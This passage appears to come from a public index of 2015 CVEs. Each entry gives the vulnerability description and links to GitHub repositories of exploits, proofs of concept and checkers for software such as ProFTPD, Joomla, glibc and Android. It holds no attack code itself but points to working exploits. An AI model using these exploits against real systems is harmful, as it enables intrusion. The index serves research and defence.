### CVE-2015-3195 (2015-12-06)

The ASN1_TFLG_COMBINE implementation in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zh, 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1q, and 1.0.2 before 1.0.2e mishandles errors caused by malformed X509_ATTRIBUTE data, which allows remote attackers to obtain sensitive information from process memory by triggering a decoding failure in a PKCS#7 or CMS application.

- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3195](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3195)

### CVE-2015-3197 (2016-02-15)

ssl/s2_srvr.c in OpenSSL 1.0.1 before 1.0.1r and 1.0.2 before 1.0.2f does not prevent use of disabled ciphers, which makes it easier for man-in-the-middle attackers to defeat cryptographic protection mechanisms by performing computations on SSLv2 traffic, related to the get_client_master_key and get_client_hello functions.

- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3197](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3197)

### CVE-2015-3224 (2015-07-26)

request.rb in Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request.

- [0x00-0x00/CVE-2015-3224](https://github.com/0x00-0x00/CVE-2015-3224)
- [0xEval/cve-2015-3224](https://github.com/0xEval/cve-2015-3224)
- [n000xy/CVE-2015-3224-](https://github.com/n000xy/CVE-2015-3224-)

### CVE-2015-3306 (2015-05-18)

The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.

- [shk0x/cpx_proftpd](https://github.com/shk0x/cpx_proftpd)
- [nootropics/propane](https://github.com/nootropics/propane)
- [t0kx/exploit-CVE-2015-3306](https://github.com/t0kx/exploit-CVE-2015-3306)
- [davidtavarez/CVE-2015-3306](https://github.com/davidtavarez/CVE-2015-3306)
- [cved-sources/cve-2015-3306](https://github.com/cved-sources/cve-2015-3306)
- [hackarada/cve-2015-3306](https://github.com/hackarada/cve-2015-3306)
- [cdedmondson/Modified-CVE-2015-3306-Exploit](https://github.com/cdedmondson/Modified-CVE-2015-3306-Exploit)
- [cd6629/CVE-2015-3306-Python-PoC](https://github.com/cd6629/CVE-2015-3306-Python-PoC)
- [0xm4ud/ProFTPD_CVE-2015-3306](https://github.com/0xm4ud/ProFTPD_CVE-2015-3306)
- [jptr218/proftpd_bypass](https://github.com/jptr218/proftpd_bypass)
- [JoseLRC97/ProFTPd-1.3.5-mod_copy-Remote-Command-Execution](https://github.com/JoseLRC97/ProFTPd-1.3.5-mod_copy-Remote-Command-Execution)

### CVE-2015-3337 (2015-05-01)

Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.

- [jas502n/CVE-2015-3337](https://github.com/jas502n/CVE-2015-3337)

### CVE-2015-3456 (2015-05-13)

The Floppy Disk Controller (FDC) in QEMU, as used in Xen 4.5.x and earlier and KVM, allows local guest users to cause a denial of service (out-of-bounds write and guest crash) or possibly execute arbitrary code via the (1) FD_CMD_READ_ID, (2) FD_CMD_DRIVE_SPECIFICATION_COMMAND, or other unspecified commands, aka VENOM.

- [vincentbernat/cve-2015-3456](https://github.com/vincentbernat/cve-2015-3456)
- [orf53975/poisonfrog](https://github.com/orf53975/poisonfrog)

### CVE-2015-3636 (2015-08-06)

The ping_unhash function in net/ipv4/ping.c in the Linux kernel before 4.0.3 does not initialize a certain list data structure during an unhash operation, which allows local users to gain privileges or cause a denial of service (use-after-free and system crash) by leveraging the ability to make a SOCK_DGRAM socket system call for the IPPROTO_ICMP or IPPROTO_ICMPV6 protocol, and then making a connect system call after a disconnect.

- [betalphafai/cve-2015-3636_crash](https://github.com/betalphafai/cve-2015-3636_crash)
- [askk/libping_unhash_exploit_POC](https://github.com/askk/libping_unhash_exploit_POC)
- [ludongxu/cve-2015-3636](https://github.com/ludongxu/cve-2015-3636)
- [fi01/CVE-2015-3636](https://github.com/fi01/CVE-2015-3636)
- [android-rooting-tools/libpingpong_exploit](https://github.com/android-rooting-tools/libpingpong_exploit)
- [debugfan/rattle_root](https://github.com/debugfan/rattle_root)
- [a7vinx/CVE-2015-3636](https://github.com/a7vinx/CVE-2015-3636)

### CVE-2015-3825
- [roeeh/conscryptchecker](https://github.com/roeeh/conscryptchecker)

### CVE-2015-3837 (2015-10-01)

The OpenSSLX509Certificate class in org/conscrypt/OpenSSLX509Certificate.java in Android before 5.1.1 LMY48I improperly includes certain context data during serialization and deserialization, which allows attackers to execute arbitrary code via an application that sends a crafted Intent, aka internal bug 21437603.

- [itibs/IsildursBane](https://github.com/itibs/IsildursBane)

### CVE-2015-3839 (2017-08-07)

The updateMessageStatus function in Android 5.1.1 and earlier allows local users to cause a denial of service (NULL pointer exception and process crash).

- [mabin004/cve-2015-3839_PoC](https://github.com/mabin004/cve-2015-3839_PoC)

### CVE-2015-3864 (2015-10-01)

Integer underflow in the MPEG4Extractor::parseChunk function in MPEG4Extractor.cpp in libstagefright in mediaserver in Android before 5.1.1 LMY48M allows remote attackers to execute arbitrary code via crafted MPEG-4 data, aka internal bug 23034759. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-3824.

- [pwnaccelerator/stagefright-cve-2015-3864](https://github.com/pwnaccelerator/stagefright-cve-2015-3864)
- [eudemonics/scaredycat](https://github.com/eudemonics/scaredycat)
- [HenryVHuang/CVE-2015-3864](https://github.com/HenryVHuang/CVE-2015-3864)
- [Bhathiya404/Exploiting-Stagefright-Vulnerability-CVE-2015-3864](https://github.com/Bhathiya404/Exploiting-Stagefright-Vulnerability-CVE-2015-3864)
- [Cmadhushanka/CVE-2015-3864-Exploitation](https://github.com/Cmadhushanka/CVE-2015-3864-Exploitation)

### CVE-2015-4000 (2015-05-21)

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the "Logjam" issue.

- [fatlan/HAProxy-Keepalived-Sec-HighLoads](https://github.com/fatlan/HAProxy-Keepalived-Sec-HighLoads)

### CVE-2015-4495 (2015-08-08)

The PDF reader in Mozilla Firefox before 39.0.3, Firefox ESR 38.x before 38.1.1, and Firefox OS before 2.2 allows remote attackers to bypass the Same Origin Policy, and read arbitrary files or gain privileges, via vectors involving crafted JavaScript code and a native setter, as exploited in the wild in August 2015.

- [vincd/CVE-2015-4495](https://github.com/vincd/CVE-2015-4495)

### CVE-2015-4843 (2015-10-21)

Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.

- [Soteria-Research/cve-2015-4843-type-confusion-phrack](https://github.com/Soteria-Research/cve-2015-4843-type-confusion-phrack)

### CVE-2015-4852 (2015-11-18)

The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.

- [roo7break/serialator](https://github.com/roo7break/serialator)
- [AndersonSingh/serialization-vulnerability-scanner](https://github.com/AndersonSingh/serialization-vulnerability-scanner)
- [zhzhdoai/Weblogic_Vuln](https://github.com/zhzhdoai/Weblogic_Vuln)
- [nex1less/CVE-2015-4852](https://github.com/nex1less/CVE-2015-4852)

### CVE-2015-4870 (2015-10-21)

Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.

- [OsandaMalith/CVE-2015-4870](https://github.com/OsandaMalith/CVE-2015-4870)

### CVE-2015-5119 (2015-07-08)

Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.

- [jvazquez-r7/CVE-2015-5119](https://github.com/jvazquez-r7/CVE-2015-5119)
- [CiscoCXSecurity/CVE-2015-5119_walkthrough](https://github.com/CiscoCXSecurity/CVE-2015-5119_walkthrough)
- [dangokyo/CVE-2015-5119](https://github.com/dangokyo/CVE-2015-5119)

### CVE-2015-5195 (2017-07-21)

ntp_openssl.m4 in ntpd in NTP before 4.2.7p112 allows remote attackers to cause a denial of service (segmentation fault) via a crafted statistics or filegen configuration command that is not enabled during compilation.

- [theglife214/CVE-2015-5195](https://github.com/theglife214/CVE-2015-5195)

### CVE-2015-5254 (2016-01-08)

Apache ActiveMQ 5.x before 5.13.0 does not restrict the classes that can be serialized in the broker, which allows remote attackers to execute arbitrary code via a crafted serialized Java Message Service (JMS) ObjectMessage object.

- [jas502n/CVE-2015-5254](https://github.com/jas502n/CVE-2015-5254)
- [Ma1Dong/ActiveMQ_CVE-2015-5254](https://github.com/Ma1Dong/ActiveMQ_CVE-2015-5254)

### CVE-2015-5347 (2016-04-12)

Cross-site scripting (XSS) vulnerability in the getWindowOpenJavaScript function in org.apache.wicket.extensions.ajax.markup.html.modal.ModalWindow in Apache Wicket 1.5.x before 1.5.15, 6.x before 6.22.0, and 7.x before 7.2.0 might allow remote attackers to inject arbitrary web script or HTML via a ModalWindow title.

- [alexanderkjall/wicker-cve-2015-5347](https://github.com/alexanderkjall/wicker-cve-2015-5347)

### CVE-2015-5374 (2015-07-18)

A vulnerability has been identified in Firmware variant PROFINET IO for EN100 Ethernet module: All versions < V1.04.01; Firmware variant Modbus TCP for EN100 Ethernet module: All versions < V1.11.00; Firmware variant DNP3 TCP for EN100 Ethernet module: All versions < V1.03; Firmware variant IEC 104 for EN100 Ethernet module: All versions < V1.21; EN100 Ethernet module included in SIPROTEC Merging Unit 6MU80: All versions < 1.02.02. Specially crafted packets sent to port 50000/UDP could cause a denial-of-service of the affected device. A manual reboot may be required to recover the service of the device.

- [can/CVE-2015-5374-DoS-PoC](https://github.com/can/CVE-2015-5374-DoS-PoC)

### CVE-2015-5377 (2018-03-06)

Elasticsearch before 1.6.1 allows remote attackers to execute arbitrary code via unspecified vectors involving the transport protocol. NOTE: ZDI appears to claim that CVE-2015-3253 and CVE-2015-5377 are the same vulnerability.

- [fi3ro/CVE-2015-5377](https://github.com/fi3ro/CVE-2015-5377)

### CVE-2015-5477 (2015-07-29)

named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.

- [robertdavidgraham/cve-2015-5477](https://github.com/robertdavidgraham/cve-2015-5477)
- [elceef/tkeypoc](https://github.com/elceef/tkeypoc)
- [hmlio/vaas-cve-2015-5477](https://github.com/hmlio/vaas-cve-2015-5477)
- [knqyf263/cve-2015-5477](https://github.com/knqyf263/cve-2015-5477)
- [ilanyu/cve-2015-5477](https://github.com/ilanyu/cve-2015-5477)
- [likekabin/ShareDoc_cve-2015-5477](https://github.com/likekabin/ShareDoc_cve-2015-5477)
- [xycloops123/TKEY-remote-DoS-vulnerability-exploit](https://github.com/xycloops123/TKEY-remote-DoS-vulnerability-exploit)

### CVE-2015-5531 (2015-08-17)

Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.

- [xpgdgit/CVE-2015-5531](https://github.com/xpgdgit/CVE-2015-5531)
- [M0ge/CVE-2015-5531-POC](https://github.com/M0ge/CVE-2015-5531-POC)

### CVE-2015-5602 (2015-11-17)

sudoedit in Sudo before 1.8.15 allows local users to gain privileges via a symlink attack on a file whose full path is defined using multiple wildcards in /etc/sudoers, as demonstrated by "/home/*/*/file.txt."

- [t0kx/privesc-CVE-2015-5602](https://github.com/t0kx/privesc-CVE-2015-5602)
- [cved-sources/cve-2015-5602](https://github.com/cved-sources/cve-2015-5602)

### CVE-2015-5932 (2015-10-23)

The kernel in Apple OS X before 10.11.1 allows local users to gain privileges by leveraging an unspecified "type confusion" during Mach task processing.

- [jndok/tpwn-bis](https://github.com/jndok/tpwn-bis)

### CVE-2015-5995 (2015-12-31)

Mediabridge Medialink MWN-WAPR300N devices with firmware 5.07.50 and Tenda N3 Wireless N150 devices allow remote attackers to obtain administrative access via a certain admin substring in an HTTP Cookie header.

- [shaheemirza/TendaSpill](https://github.com/shaheemirza/TendaSpill)

### CVE-2015-6086 (2015-11-11)

Microsoft Internet Explorer 9 through 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability."

- [payatu/CVE-2015-6086](https://github.com/payatu/CVE-2015-6086)

### CVE-2015-6095 (2015-11-11)

Kerberos in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 Gold and 1511 mishandles password changes, which allows physically proximate attackers to bypass authentication, and conduct decryption attacks against certain BitLocker configurations, by connecting to an unintended Key Distribution Center (KDC), aka "Windows Kerberos Security Feature Bypass."

- [JackOfMostTrades/bluebox](https://github.com/JackOfMostTrades/bluebox)

### CVE-2015-6132 (2015-12-09)

Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 Gold and 1511 mishandle library loading, which allows local users to gain privileges via a crafted application, aka "Windows Library Loading Remote Code Execution Vulnerability."

- [hexx0r/CVE-2015-6132](https://github.com/hexx0r/CVE-2015-6132)

### CVE-2015-6357 (2015-11-18)

The rule-update feature in Cisco FireSIGHT Management Center (MC) 5.2 through 5.4.0.1 does not verify the X.509 certificate of the support.sourcefire.com SSL server, which allows man-in-the-middle attackers to spoof this server and provide an invalid package, and consequently execute arbitrary code, via a crafted certificate, aka Bug ID CSCuw06444.

- [mattimustang/firepwner](https://github.com/mattimustang/firepwner)

### CVE-2015-6576 (2017-10-02)

Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.

- [CallMeJonas/CVE-2015-6576](https://github.com/CallMeJonas/CVE-2015-6576)

### CVE-2015-6606 (2015-10-06)

The Secure Element Evaluation Kit (aka SEEK or SmartCard API) plugin in Android before 5.1.1 LMY48T allows attackers to gain privileges via a crafted application, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 22301786.

- [michaelroland/omapi-cve-2015-6606-exploit](https://github.com/michaelroland/omapi-cve-2015-6606-exploit)

### CVE-2015-6612 (2015-11-03)

libmedia in Android before 5.1.1 LMY48X and 6.0 before 2015-11-01 allows attackers to gain privileges via a crafted application, aka internal bug 23540426.

- [secmob/CVE-2015-6612](https://github.com/secmob/CVE-2015-6612)
- [flankerhqd/cve-2015-6612poc-forM](https://github.com/flankerhqd/cve-2015-6612poc-forM)

### CVE-2015-6620 (2015-12-08)

libstagefright in Android before 5.1.1 LMY48Z and 6.0 before 2015-12-01 allows attackers to gain privileges via a crafted application, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bugs 24123723 and 24445127.

- [flankerhqd/CVE-2015-6620-POC](https://github.com/flankerhqd/CVE-2015-6620-POC)
- [flankerhqd/mediacodecoob](https://github.com/flankerhqd/mediacodecoob)

### CVE-2015-6637 (2016-01-06)

The MediaTek misc-sd driver in Android before 5.1.1 LMY49F and 6.0 before 2016-01-01 allows attackers to gain privileges via a crafted application, aka internal bug 25307013.

- [betalphafai/CVE-2015-6637](https://github.com/betalphafai/CVE-2015-6637)

### CVE-2015-6639 (2016-01-06)

The Widevine QSEE TrustZone application in Android 5.x before 5.1.1 LMY49F and 6.0 before 2016-01-01 allows attackers to gain privileges via a crafted application that leverages QSEECOM access, aka internal bug 24446875.

- [laginimaineb/cve-2015-6639](https://github.com/laginimaineb/cve-2015-6639)
- [laginimaineb/ExtractKeyMaster](https://github.com/laginimaineb/ExtractKeyMaster)

### CVE-2015-6640 (2016-01-06)

The prctl_set_vma_anon_name function in kernel/sys.c in Android before 5.1.1 LMY49F and 6.0 before 2016-01-01 does not ensure that only one vma is accessed in a certain update action, which allows attackers to gain privileges or cause a denial of service (vma list corruption) via a crafted application, aka internal bug 20017123.

- [betalphafai/CVE-2015-6640](https://github.com/betalphafai/CVE-2015-6640)

### CVE-2015-6668 (2017-10-19)

The Job Manager plugin before 0.7.25 allows remote attackers to read arbitrary CV files via a brute force attack to the WordPress upload directory structure, related to an insecure direct object reference.

- [G01d3nW01f/CVE-2015-6668](https://github.com/G01d3nW01f/CVE-2015-6668)
- [h3xcr4ck3r/CVE-2015-6668](https://github.com/h3xcr4ck3r/CVE-2015-6668)
- [jimdiroffii/CVE-2015-6668](https://github.com/jimdiroffii/CVE-2015-6668)

### CVE-2015-6748 (2017-09-25)

Cross-site scripting (XSS) vulnerability in jsoup before 1.8.3.

- [epicosy/VUL4J-59](https://github.com/epicosy/VUL4J-59)

### CVE-2015-6835 (2016-05-16)

The session deserializer in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 mishandles multiple php_var_unserialize calls, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted session content.

- [ockeghem/CVE-2015-6835-checker](https://github.com/ockeghem/CVE-2015-6835-checker)

### CVE-2015-6967 (2015-09-16)

Unrestricted file upload vulnerability in the My Image plugin in Nibbleblog before 4.0.5 allows remote administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in content/private/plugins/my_image/image.php.

- [dix0nym/CVE-2015-6967](https://github.com/dix0nym/CVE-2015-6967)
- [0xConstant/CVE-2015-6967](https://github.com/0xConstant/CVE-2015-6967)
- [FredBrave/CVE-2015-6967](https://github.com/FredBrave/CVE-2015-6967)
- [3mpir3Albert/HTB_Nibbles](https://github.com/3mpir3Albert/HTB_Nibbles)

### CVE-2015-7214 (2015-12-16)

Mozilla Firefox before 43.0 and Firefox ESR 38.x before 38.5 allow remote attackers to bypass the Same Origin Policy via data: and view-source: URIs.

- [llamakko/CVE-2015-7214](https://github.com/llamakko/CVE-2015-7214)

### CVE-2015-7297 (2015-10-29)

SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858.

- [CCrashBandicot/ContentHistory](https://github.com/CCrashBandicot/ContentHistory)
- [areaventuno/exploit-joomla](https://github.com/areaventuno/exploit-joomla)
- [Cappricio-Securities/CVE-2015-7297](https://github.com/Cappricio-Securities/CVE-2015-7297)

### CVE-2015-7501 (2017-11-09)

Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.

- [ianxtianxt/CVE-2015-7501](https://github.com/ianxtianxt/CVE-2015-7501)

### CVE-2015-7545 (2016-04-13)

The (1) git-remote-ext and (2) unspecified other remote helper programs in Git before 2.3.10, 2.4.x before 2.4.10, 2.5.x before 2.5.4, and 2.6.x before 2.6.1 do not properly restrict the allowed protocols, which might allow remote attackers to execute arbitrary code via a URL in a (a) .gitmodules file or (b) unknown other sources in a submodule.

- [avuserow/bug-free-chainsaw](https://github.com/avuserow/bug-free-chainsaw)

### CVE-2015-7547 (2016-02-18)

Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc functions in the libresolv library in the GNU C Library (aka glibc or libc6) before 2.23 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted DNS response that triggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6 address family, related to performing "dual A/AAAA DNS queries" and the libnss_dns.so.2 NSS module.

- [fjserna/CVE-2015-7547](https://github.com/fjserna/CVE-2015-7547)
- [cakuzo/CVE-2015-7547](https://github.com/cakuzo/CVE-2015-7547)
- [t0r0t0r0/CVE-2015-7547](https://github.com/t0r0t0r0/CVE-2015-7547)
- [rexifiles/rex-sec-glibc](https://github.com/rexifiles/rex-sec-glibc)
- [babykillerblack/CVE-2015-7547](https://github.com/babykillerblack/CVE-2015-7547)
- [jgajek/cve-2015-7547](https://github.com/jgajek/cve-2015-7547)
- [eSentire/cve-2015-7547-public](https://github.com/eSentire/cve-2015-7547-public)
- [bluebluelan/CVE-2015-7547-proj-master](https://github.com/bluebluelan/CVE-2015-7547-proj-master)
- [miracle03/CVE-2015-7547-master](https://github.com/miracle03/CVE-2015-7547-master)
- [Stick-U235/CVE-2015-7547-Research](https://github.com/Stick-U235/CVE-2015-7547-Research)
- [Amilaperera12/Glibc-Vulnerability-Exploit-CVE-2015-7547](https://github.com/Amilaperera12/Glibc-Vulnerability-Exploit-CVE-2015-7547)

### CVE-2015-7755 (2015-12-19)

Juniper ScreenOS 6.2.0r15 through 6.2.0r18, 6.3.0r12 before 6.3.0r12b, 6.3.0r13 before 6.3.0r13b, 6.3.0r14 before 6.3.0r14b, 6.3.0r15 before 6.3.0r15b, 6.3.0r16 before 6.3.0r16b, 6.3.0r17 before 6.3.0r17b, 6.3.0r18 before 6.3.0r18b, 6.3.0r19 before 6.3.0r19b, and 6.3.0r20 before 6.3.0r21 allows remote attackers to obtain administrative access by entering an unspecified password during a (1) SSH or (2) TELNET session.

- [hdm/juniper-cve-2015-7755](https://github.com/hdm/juniper-cve-2015-7755)
- [cinno/CVE-2015-7755-POC](https://github.com/cinno/CVE-2015-7755-POC)

### CVE-2015-7808 (2015-11-24)

The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.

- [Prajithp/CVE-2015-7808](https://github.com/Prajithp/CVE-2015-7808)

### CVE-2015-8088 (2016-01-12)

Heap-based buffer overflow in the HIFI driver in Huawei Mate 7 phones with software MT7-UL00 before MT7-UL00C17B354, MT7-TL10 before MT7-TL10C00B354, MT7-TL00 before MT7-TL00C01B354, and MT7-CL00 before MT7-CL00C92B354 and P8 phones with software GRA-TL00 before GRA-TL00C01B220SP01, GRA-CL00 before GRA-CL00C92B220, GRA-CL10 before GRA-CL10C92B220, GRA-UL00 before GRA-UL00C00B220, and GRA-UL10 before GRA-UL10C00B220 allows attackers to cause a denial of service (reboot) or execute arbitrary code via a crafted application.

- [Pray3r/CVE-2015-8088](https://github.com/Pray3r/CVE-2015-8088)

### CVE-2015-8103 (2015-11-25)

The Jenkins CLI subsystem in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to execute arbitrary code via a crafted serialized Java object, related to a problematic webapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the "Groovy variant in 'ysoserial'".

- [cved-sources/cve-2015-8103](https://github.com/cved-sources/cve-2015-8103)
- [r00t4dm/Jenkins-CVE-2015-8103](https://github.com/r00t4dm/Jenkins-CVE-2015-8103)

### CVE-2015-8239 (2017-10-10)

The SHA-2 digest support in the sudoers plugin in sudo after 1.8.7 allows local users with write permissions to parts of the called command to replace them before it is executed.

- [justinsteven/sudo_digest_toctou_poc_CVE-2015-8239](https://github.com/justinsteven/sudo_digest_toctou_poc_CVE-2015-8239)

### CVE-2015-8277 (2016-02-24)

Multiple buffer overflows in (1) lmgrd and (2) Vendor Daemon in Flexera FlexNet Publisher before 11.13.1.2 Security Update 1 allow remote attackers to execute arbitrary code via a crafted packet with opcode (a) 0x107 or (b) 0x10a.

- [securifera/CVE-2015-8277-Exploit](https://github.com/securifera/CVE-2015-8277-Exploit)

### CVE-2015-8299 (2017-08-29)

Buffer overflow in the Group messages monitor (Falcon) in KNX ETS 4.1.5 (Build 3246) allows remote attackers to execute arbitrary code via a crafted KNXnet/IP UDP packet.

- [kernoelpanic/CVE-2015-8299](https://github.com/kernoelpanic/CVE-2015-8299)

### CVE-2015-8351 (2017-09-11)

PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captcha/ajaxresponse.php. NOTE: this can also be leveraged to include and execute arbitrary local files via directory traversal sequences regardless of whether allow_url_include is enabled.

- [G01d3nW01f/CVE-2015-8351](https://github.com/G01d3nW01f/CVE-2015-8351)
- [G4sp4rCS/exploit-CVE-2015-8351](https://github.com/G4sp4rCS/exploit-CVE-2015-8351)

### CVE-2015-8543 (2015-12-28)

The networking implementation in the Linux kernel through 4.3.3, as used in Android and other products, does not validate protocol identifiers for certain protocol families, which allows local users to cause a denial of service (NULL function pointer dereference and system crash) or possibly gain privileges by leveraging CLONE_NEWUSER support to execute a crafted SOCK_RAW application.

- [bittorrent3389/CVE-2015-8543_for_SLE12SP1](https://github.com/bittorrent3389/CVE-2015-8543_for_SLE12SP1)

### CVE-2015-8562 (2015-12-16)

Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.

- [ZaleHack/joomla_rce_CVE-2015-8562](https://github.com/ZaleHack/joomla_rce_CVE-2015-8562)
- [RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC](https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC)
- [atcasanova/cve-2015-8562-exploit](https://github.com/atcasanova/cve-2015-8562-exploit)
- [thejackerz/scanner-exploit-joomla-CVE-2015-8562](https://github.com/thejackerz/scanner-exploit-joomla-CVE-2015-8562)
- [paralelo14/CVE-2015-8562](https://github.com/paralelo14/CVE-2015-8562)
- [VoidSec/Joomla_CVE-2015-8562](https://github.com/VoidSec/Joomla_CVE-2015-8562)
- [xnorkl/Joomla_Payload](https://github.com/xnorkl/Joomla_Payload)
- [guanjivip/CVE-2015-8562](https://github.com/guanjivip/CVE-2015-8562)
- [lorenzodegiorgi/setup-cve-2015-8562](https://github.com/lorenzodegiorgi/setup-cve-2015-8562)
- [Caihuar/Joomla-cve-2015-8562](https://github.com/Caihuar/Joomla-cve-2015-8562)

### CVE-2015-8651 (2015-12-28)

Integer overflow in Adobe Flash Player before 18.0.0.324 and 19.x and 20.x before 20.0.0.267 on Windows and OS X and before 11.2.202.559 on Linux, Adobe AIR before 20.0.0.233, Adobe AIR SDK before 20.0.0.233, and Adobe AIR SDK & Compiler before 20.0.0.233 allows attackers to execute arbitrary code via unspecified vectors.

- [Gitlabpro/The-analysis-of-the-cve-2015-8651](https://github.com/Gitlabpro/The-analysis-of-the-cve-2015-8651)

### CVE-2015-8660 (2015-12-28)

The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application.

- [whu-enjoy/CVE-2015-8660](https://github.com/whu-enjoy/CVE-2015-8660)
- [nhamle2/CVE-2015-8660](https://github.com/nhamle2/CVE-2015-8660)
- [carradolly/CVE-2015-8660](https://github.com/carradolly/CVE-2015-8660)

### CVE-2015-8710 (2016-04-11)

The htmlParseComment function in HTMLparser.c in libxml2 allows attackers to obtain sensitive information, cause a denial of service (out-of-bounds heap memory access and application crash), or possibly have unspecified other impact via an unclosed HTML comment.

- [Karm/CVE-2015-8710](https://github.com/Karm/CVE-2015-8710)

### CVE-2015-9235 (2018-05-29)

In the jsonwebtoken node module before 4.2.2, it is possible for an attacker to bypass verification when a token is expected to be digitally signed with an asymmetric key (RS/ES family of algorithms) but the attacker instead sends a token digitally signed with a symmetric algorithm (HS* family).

- [aalex954/jwt-key-confusion-poc](https://github.com/aalex954/jwt-key-confusion-poc)
- [WinDyAlphA/CVE-2015-9235_JWT_key_confusion](https://github.com/WinDyAlphA/CVE-2015-9235_JWT_key_confusion)

### CVE-2015-9251 (2018-01-18)

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.

- [halkichi0308/CVE-2015-9251](https://github.com/halkichi0308/CVE-2015-9251)

### CVE-2015-10034 (2023-01-09)

A critical vulnerability was found in j-nowak workout-organizer. It affects unknown program code. Manipulation with unknown data can exploit a SQL injection vulnerability. The patch is identified as 13cd6c3d1210640bfdb39872b2bb3597aa991279. Patching is recommended as the best possible countermeasure.

- [andrenasx/CVE-2015-10034](https://github.com/andrenasx/CVE-2015-10034)

### CVE-2015-20107 (2022-04-13)

In Python (aka CPython) up to 3.10.8, the mailcap module does not add escape characters into commands discovered in the system mailcap file. This may allow attackers to inject shell commands into applications that call mailcap.findmatch with untrusted input (if they lack validation of user-provided filenames or arguments). The fix is also back-ported to 3.7, 3.8, and 3.9.

- [codeskipper/python-patrol](https://github.com/codeskipper/python-patrol)

### CVE-2015-57115
- [TrixSec/CVE-2015-57115](https://github.com/TrixSec/CVE-2015-57115)

## 2014
### CVE-2014-0038 (2014-02-06)

